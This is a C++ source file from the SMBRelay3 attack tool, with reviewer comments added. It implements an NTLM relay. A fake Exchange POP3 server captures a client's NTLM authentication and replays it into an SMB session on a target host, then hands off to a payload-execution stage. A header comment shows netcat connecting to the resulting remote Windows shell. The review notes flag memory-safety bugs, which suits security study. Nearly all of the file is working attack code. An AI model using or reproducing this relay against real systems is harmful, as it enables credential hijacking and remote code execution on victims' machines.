C:/Web/smbrelay3/src/pop3relay.cpp

00001 /*
00002     SMBRelay3 - POP3 REPLAY ATTACK MODULE
00003     -------------------------------------
00004 
00005 
00006 C:\smbrelay>nc 192.168.47.128 8080
00007 Microsoft Windows 2000 [Versión 5.00.2195]
00008 (C) Copyright 1985-2000 Microsoft Corp.
00009 
00010 C:\WINNT\system32>
00011 
00012 */
00013 
00014 
00015 #include "pop3relay.h"
00016 #include "payload.h"
00017 
00018 extern int verbose;
00019 
/**
 * Serve one POP3 client connection on relay->source and relay its NTLM
 * authentication exchange into an SMB session opened against
 * destinationhostname:destinationport.
 *
 * Sequence as implemented below: POP3 banner, optional CAPA, AUTH NTLM,
 * NTLM type 1 from the client, SMB Negotiate Protocol plus a type 1
 * session setup to the destination, the server's type 2 challenge handed
 * back to the POP3 client, and the client's type 3 response carried into
 * the final SessionSetupAndX.
 *
 * @param relay                 Connection pair. relay->source carries the POP3
 *                              dialogue; relay->destination carries SMB and is
 *                              presumably opened by ConnectToRemoteHost (not
 *                              visible here - confirm).
 * @param destinationhostname   SMB host the relayed authentication is sent to.
 * @param destinationport       TCP port on that host.
 * @return 1 when the SMB SessionSetupAndX reports success (after ExecuteCode
 *         has been called), 0 on any network, protocol or authentication
 *         failure.
 *
 * NOTE(review): SmbPacket1/SmbPacket2/SmbPacket3 are heap packets (they are
 * never freed on any path), and several writes into the fixed 4096-byte
 * buffers are not bounded by this function; see the per-line notes.
 */
int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname, int destinationport)
{
        // POP3 side: client commands and the base64 NTLM tokens it sends.
        char buffer[4096];
        // SMB side responses; later also the "+ <base64 challenge>" line for the client.
        char buf[4096];
        // Base64-decoded NTLM blobs (type 1, then the base64 challenge, then type 3).
        char buf1[4096];
        // NTLM type 3 rebuilt by buildAuthResponse for the SMB SessionSetupAndX.
        char buf2[4096];

        // Filled by GetNTLMPacketInfo from the client's decoded type 3 message.
        // NOTE(review): the 256-byte bound is not passed to that helper - confirm it limits its copies.
        char CurrentUserName[256];
        char CurrentDomain[256];
        char CurrentWorkstation[256];
        // NOTE(review): none of these packets is freed on any return path below.
        smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
    tSmbNtlmAuthRequest *request;
        
        // Byte length of the NTLM blob most recently decoded / copied into buf1.
        uint16 packetlen;
        // Byte count returned by the send/receive helper; also reused as the dialect block length.
        int i;
        // Dialect list built by AddDialect and handed to BuildSmbPacket.
    char *p;
        const char WelcomeMessage[]= "+OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 (SmbRelay) ready\r\n";
    // Canned POP3 replies; each is sent verbatim with strlen() as its length.
    #define ERRORR "-ERR The specified authentication package is not supported.\r\n"
    #define CAPA "+OK Capability list follows\r\nAUTH NTLM\r\n+OK\r\n"
    #define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n"
    #define AUTHOK "+OK User successfully logged on.\r\n"
    #define AUTHERROR "-ERR Authentication Failed\r\n"
    

    // Banner, then wait for the client's first command (read into buffer, not NUL-terminated yet).
    printf("[+] Sending POP3 Banner\n");
    i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0){
                // NOTE(review): "EHLO" is an SMTP term; this message looks copied from the SMTP module.
                printf("Error Reading EHLO message\n");
        return(0);
        }
    

    // Optional CAPA: advertise AUTH NTLM and read the next command.
    if (memcmp(buffer,"CAPA",4)==0) {
                printf("[+] CAPA Requests\n");
        i=SendBytesAndWaitForResponse(relay->source,(char*)CAPA, strlen(CAPA), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0) return(0);
        // NOTE(review): writes past the end if the helper can return i == sizeof(buffer) - confirm its contract.
        buffer[i]='\0';
        }
    // Anything other than AUTH is rejected; otherwise answer the AUTH mechanism list and read the next line.
    if (memcmp(buffer,"AUTH",4)!=0) {
                printf("[-] AUTH NTLM packet not received from client\n");
        i=SendBytesAndWaitForResponse(relay->source,(char*)ERRORR, strlen(ERRORR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
    } else {
        printf("[+] Sending AUTH NTLM option to the client\r\n");
        i=SendBytesAndWaitForResponse(relay->source,(char*)AUTH, strlen(AUTH), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0) return(0);
        // See the same-index note above: i == sizeof(buffer) would write one past the array.
        buffer[i]='\0';
    }

    if (memcmp(buffer,"AUTH NTLM",9)!=0) {
        printf("[-] Not supported option %s received\n",buffer);
        return(0);
    }
    // Two client styles: the type 1 token on the AUTH NTLM line itself (offset 12,
    // i.e. past "AUTH NTLM "), or on a separate line after our "+ OK" continuation.
    if (strlen(buffer)>12){
        printf("[+] received AUTH NTLM message\n");
        memset((char*)&buf1,'\0',sizeof(buf1));
            // NOTE(review): no output size is passed to from64tobits; bound is buf1's 4096 bytes only by assumption.
            packetlen=from64tobits(buf1, buffer+12);
        request=(tSmbNtlmAuthRequest *)buf1;
        // Dumped unconditionally here, but only under debug in the else branch.
        dumpAuthRequest(0,request);
    } else {
        memset(buffer,'\0',sizeof(buffer));
        i=SendBytesAndWaitForResponse(relay->source,(char*)"+ OK\r\n", 6, buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0){
                    printf("[-] Error Auth response with NTLM type1 packet\n");
            return(0);
            }
        buffer[i]='\0';
        printf("[+] received AUTH NTLM message\n");
        memset((char*)&buf1,'\0',sizeof(buf1));
            packetlen=from64tobits(buf1, buffer);        
        request=(tSmbNtlmAuthRequest *)buf1;
        
        // `debug` is not declared in this file; presumably a global from the header.
        if (debug) {
            printf("[+] received AUTH NTLM message: %s\n",buffer);
            DumpMem(buf1,packetlen);
            dumpAuthRequest(0,request);
        }
    }
    

        //Init Replay Attack
    // Open the SMB side. ConnectToRemoteHost returns 0 on failure; how it stores the
    // socket in relay is not visible here.
    i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
        if (!i) {
                printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport); 
                return(0);
        }
        printf("[+] Sending SMB Protocol Authentication Handshake\n");
    // Build the dialect list; i is passed by address to each call and is then used as
    // the list length, so it presumably accumulates the block size - confirm in AddDialect.
    p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
    p = AddDialect(p,"LANMAN1.0", 0x02,&i);
    p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
    p = AddDialect(p,"LM1.2X002", 0x02,&i);
    p = AddDialect(p,"LANMAN2.1", 0x02,&i);
    p = AddDialect(p,"NT LM 0.12", 0x02,&i);
        NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
    free(p);
    // The negotiate response lands in buf but is only checked for being non-empty.
    i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    free(NegotiateProtocol);
        if (i<=0){
                printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
        return(0);
        }
        
        // Type 1 session setup to the server; GetSmbPacket2 returns the server's type 2 (challenge) packet.
        SmbPacket1=BuildSmbPacket1();
        if (debug)  {
                printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
                DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
        }

        SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
        if  (SmbPacket2==NULL) {
                printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
        return(0);
        }
        printf("[+] Received SMB Message with NTLM message type 2 packet\n");
        // The two bytes four before the NTLM blob are taken as its length; presumably a
        // blob-length field of the enclosing SMB structure. Raw copy into uint16 assumes
        // host byte order matches the wire order - confirm.
        memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);

    if (debug) {
        printf("[*] SMB Packet Dump:\n");
        DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
        printf("[*] NTLM Challenge packet from SMB message\n");
        DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
        dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
    }
                
    // The challenge's negotiate flags are overwritten with a fixed value before it is
    // relayed; the reason for this particular value is not documented here.
    ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
        memset(buf1,'\0',sizeof(buf1));
        to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
        // NOTE(review): unbounded sprintf; buf and buf1 are the same size, so a near-full
        // buf1 plus the "+ " and "\r\n" framing overruns buf.
        sprintf(buf,"+ %s\r\n",buf1);

        printf("[+] Replaying NTLM Challenge from SMB Server to the POP3 Client\n");
        if (debug)
        {
                // NOTE(review): says "SMTP" in a POP3 module; likely copied from the SMTP variant.
                printf("[+] Sending SMTP Response: %s\n",buf);
        }   
    // Send the challenge line and wait for the client's type 3 token.
    i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0)
        {
                printf("[-] Unable to read NTLM packet 3 from POP3 client\n");
        return(0);
        }
    buffer[i]='\0';

    if (debug) printf("[*] Response: %s\n",buffer);
        // Decode the client's type 3 into buf1 (same unbounded-decode caveat as above).
        memset((char*)&buf1,'\0',sizeof(buf1));
        packetlen=from64tobits(buf1, buffer);
    if (debug) {
        
                    printf("[*] Raw authorization packet (len: %i)\n",packetlen);
                    DumpMem(buf1,packetlen);
            dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);    
        }

    
        // Extract user / domain / workstation from the type 3, then rebuild a type 3 in buf2
        // from the server's challenge and the client's response. The two NULL arguments are
        // presumably unused password/domain inputs - confirm against buildAuthResponse.
        GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
        printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
        buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
    // SmbPacket2 is passed as the template, presumably so header fields (ids) are carried over.
    SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
    

        printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
        if (debug) 
        {
                DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
        }

    i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        if (i<=0){
                printf("[-] Error reading Server Authentication Response\n");
        i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
        }
        if (debug)  {
                printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
                DumpMem(buf,i);
        }

        // NOTE(review): the header and Action field are read from buf without checking that
        // i covers them; a short response would expose stale bytes from the earlier negotiate reply.
        if (((smheader*)buf)->NtStatus!=0x00000000) {
                printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
        // NOTE(review): sends AUTHOK but with strlen(AUTHERROR) bytes, so the client gets a
        // truncated "+OK ..." on a failure path; AUTHERROR was presumably intended here.
        i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
        }
    // Action bit 0 set means the server granted only a guest session; treated as failure.
    if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
    {
         printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
         i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
         
        return(0);
    }
                
        //WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData);
        
        printf("[+] SessionSetupAndX Completed \n");
        printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
    // Tell the client it is logged in (its reply, if any, is ignored), then hand the
    // relay to the payload stage (payload.h). The return value of that call is not checked.
    i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        ExecuteCode( *relay);

    return(1);

}
00219 
00220 
